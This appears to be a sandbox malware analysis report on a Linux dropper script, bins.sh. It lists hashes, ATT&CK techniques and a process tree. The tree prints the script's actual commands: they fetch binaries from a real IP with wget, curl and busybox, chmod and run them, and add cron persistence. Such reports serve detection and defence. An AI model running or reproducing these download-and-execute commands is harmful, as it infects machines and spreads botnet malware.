40d95128ef74aeb3e7db7937e9f0a369166df804da9ef079f261d12f41290c19

Analysis

max time kernel
150s
max time network
171s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-11-2024 00:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

189e44c8b7f08b35f7db2c3a93458409
SHA1

02f6a3087388a4fd264c352cb40ba6a7aa3867d0
SHA256

40d95128ef74aeb3e7db7937e9f0a369166df804da9ef079f261d12f41290c19
SHA512

26d3894c6c0069e9ce08a08094a5bf9335d980c9f377948f05abc558e59a67e4a98aa59bc9457eaa242223782d2b811821ed53875fa2ca82a96575cf6cb371d2
SSDEEP

192:HX8IUOHvcLp1JgfQomvLw2VMEaiqTfZ1JgMIUOHvc/aiqTf2QomvLDO:HX8IUOHvcLp1JgfQomvLw2VMd1JgMIUZ

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1899) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmod

pid	Process
675	chmod
738	chmod
760	chmod
767	chmod

Executes dropped EXE 4 IoCs

Processes:

oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNVChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c

ioc	pid	Process
/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	676	oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	740	7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO	761	ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
/tmp/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c	768	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c

Renames itself 1 IoCs

Processes:

0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c

pid	Process
769	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.GEimzh	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2ccurlcurl

description	ioc	Process
File opened for reading	/proc/904/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/973/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/11/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/585/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/829/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/831/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/887/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/1027/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/5/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/789/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/996/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/1030/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/948/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/890/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/902/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/925/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/961/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/997/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/825/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/860/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/929/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/1025/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/811/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/913/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/915/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/924/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/959/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/43/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/889/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/901/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/1003/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/1/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/275/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/776/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/817/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/869/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/911/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/953/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/17/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/583/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/896/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/939/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/1000/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/782/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/800/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/821/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/916/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/960/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/640/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/774/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/816/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/951/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/987/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/1034/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/13/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/20/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/835/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/884/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/19/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/793/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/848/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
File opened for reading	/proc/899/cmdline	0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusyboxbusyboxbusyboxbusyboxcurlwgetcurlwgetcurlwget

description	ioc	Process
File opened for modification	/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	wget
File opened for modification	/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	curl
File opened for modification	/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV	busybox
File opened for modification	/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO	busybox
File opened for modification	/tmp/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c	busybox
File opened for modification	/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	busybox
File opened for modification	/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	curl
File opened for modification	/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO	wget
File opened for modification	/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO	curl
File opened for modification	/tmp/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c	wget
File opened for modification	/tmp/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c	curl
File opened for modification	/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:637
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:639
- /usr/bin/wget
  wget http://216.126.231.240/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Writes file to tmp directory
  PID:642
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:667
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Writes file to tmp directory
  PID:670
- /bin/chmod
  chmod 777 oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - File and Directory Permissions Modification
  PID:675
- /tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  ./oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  - Executes dropped EXE
  PID:676
- /bin/rm
  rm oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy
  2⤵
  PID:679
- /usr/bin/wget
  wget http://216.126.231.240/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Writes file to tmp directory
  PID:680
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:694
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Writes file to tmp directory
  PID:732
- /bin/chmod
  chmod 777 7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  ./7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  - Executes dropped EXE
  PID:740
- /bin/rm
  rm 7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV
  2⤵
  PID:742
- /usr/bin/wget
  wget http://216.126.231.240/bins/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - Writes file to tmp directory
  PID:743
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:758
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - Writes file to tmp directory
  PID:759
- /bin/chmod
  chmod 777 ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  ./ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  - Executes dropped EXE
  PID:761
- /bin/rm
  rm ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO
  2⤵
  PID:763
- /usr/bin/wget
  wget http://216.126.231.240/bins/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  2⤵
  - Writes file to tmp directory
  PID:764
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:765
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  2⤵
  - Writes file to tmp directory
  PID:766
- /bin/chmod
  chmod 777 0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  ./0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:768
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:770
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:771
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:772
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:773
- /bin/rm
  rm 0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c
  2⤵
  PID:775
- /usr/bin/wget
  wget http://216.126.231.240/bins/L6tpjuFHbVoEVxRLuKZSsnBV1UKSkHigLl
  2⤵
  PID:778

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/0yNctI7WZrUMyKwsvZHMHW5O86VGUkwr2c

Filesize
127KB

MD5
89077b7bd4bcafca7713be43635c4862

SHA1
fc02edb8fba29ea8ee99e6157ef8560334530052

SHA256
78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

SHA512
1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

Download Submit
/tmp/7hdLibUTKlPzXJkTcFdTRd0XWg9hTPbQNV

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/tmp/ChTMGm0gc2PjQ1EIJpKFeoaWxZvwXB5QAO

Filesize
98KB

MD5
5141342d0df8699fa32a6b066a0c592e

SHA1
8157673225bd5182f16215e2aa823a25ca2d4fbc

SHA256
54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

SHA512
d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

Download Submit
/tmp/oiD3mViTelQdH5JONqP3TYLCHfyiVSrHKy

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/var/spool/cron/crontabs/tmp.GEimzh

Filesize
210B

MD5
8c7c173a32eade42431c26db1e7b2faf

SHA1
c88fb4e88bbca87eadc99241d77a7cb2cb7fa646

SHA256
c3f4977943fbf8a2833425762872920d077dc5a7a7d9e670be8511fdef4ab382

SHA512
c685991281af90ea79797b88f682e78a16919546212dd953f3d9ac77af6b1f14cd8f2c3432f09c0bf3bf6dcf8f3fe70af5a3cc2a68d59c83e1b1e172dd3275d4

Download Submit